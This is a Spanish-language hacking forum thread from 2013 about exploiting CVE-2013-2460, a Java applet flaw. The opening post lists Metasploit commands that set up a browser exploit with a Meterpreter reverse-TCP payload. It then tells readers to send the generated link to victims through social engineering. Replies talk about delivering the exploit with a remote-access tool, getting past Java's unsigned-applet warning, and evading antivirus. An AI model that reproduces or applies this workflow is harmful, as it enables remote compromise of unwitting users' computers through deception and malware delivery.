Página 1 de 1
CVE-2013-2460
Publicado: 03 Jul 2013, 17:32
por Stuxnet
CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method
Este módulo de Metasploit abusa el método inseguro invoke() de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.
Explotando CVE-2013-2460 con mestasploit:
// Cargamos el módulo
Código: Seleccionar todo
msf > use exploit/multi/browser/java_jre17_provider_skeleton
// Cargamos el payload para el meterpreter
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]
msf exploit(java_jre17_provider_skeleton) > set uripath /
msf exploit(java_jre17_provider_skeleton) > exploit
Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.
Re: CVE-2013-2460
Publicado: 06 Jul 2013, 01:53
por adwind
Alguien que suba el .jar y les hago un update con el adwind webfake con este exploit :p
Re: CVE-2013-2460
Publicado: 13 Jul 2013, 00:53
por jorge705
adwind escribió:Alguien que suba el .jar y les hago un update con el adwind webfake con este exploit :p
[Enlace externo eliminado para invitados]
Re: CVE-2013-2460
Publicado: 16 Jul 2013, 16:38
por davidad
que lastima, salta la proteccion de que el JRE no es valido o esta sin firmar.
Alguien consigue saltarse dicho mensajito??
Re: CVE-2013-2460
Publicado: 19 Jul 2013, 02:31
por adwind
davidad escribió:que lastima, salta la proteccion de que el JRE no es valido o esta sin firmar.
Alguien consigue saltarse dicho mensajito??
este exploit se compila sin firmar el jar davidad.
y claro funciona con las versiones que indica.
Re: CVE-2013-2460
Publicado: 30 Jul 2013, 17:02
por davidad
Porque sale eso si se supone que es capaz de saltarselo??
Gracias!
Re: CVE-2013-2460
Publicado: 30 Jul 2013, 17:29
por davidad
Edito: Con el jre17 si me ha dejado. Esa imagen es del 21 aunque se supone que tambien es compatible...
Ahora solo hay que luchar contra el antivirus...
Antes dejaban modificar el post en un plazo de 3horas, ¿por que ahora no?
Re: CVE-2013-2460
Publicado: 30 Jul 2013, 22:45
por adwind
davidad escribió:Edito: Con el jre17 si me ha dejado. Esa imagen es del 21 aunque se supone que tambien es compatible...
Ahora solo hay que luchar contra el antivirus...
Antes dejaban modificar el post en un plazo de 3horas, ¿por que ahora no?
Ya estan aplicando nuevos metodos de seguridad. Aunque en mi opinion la forma mas facil de evitar estos exploits es que se obligue al usuario a actualizar. Si no no ejecute nada.
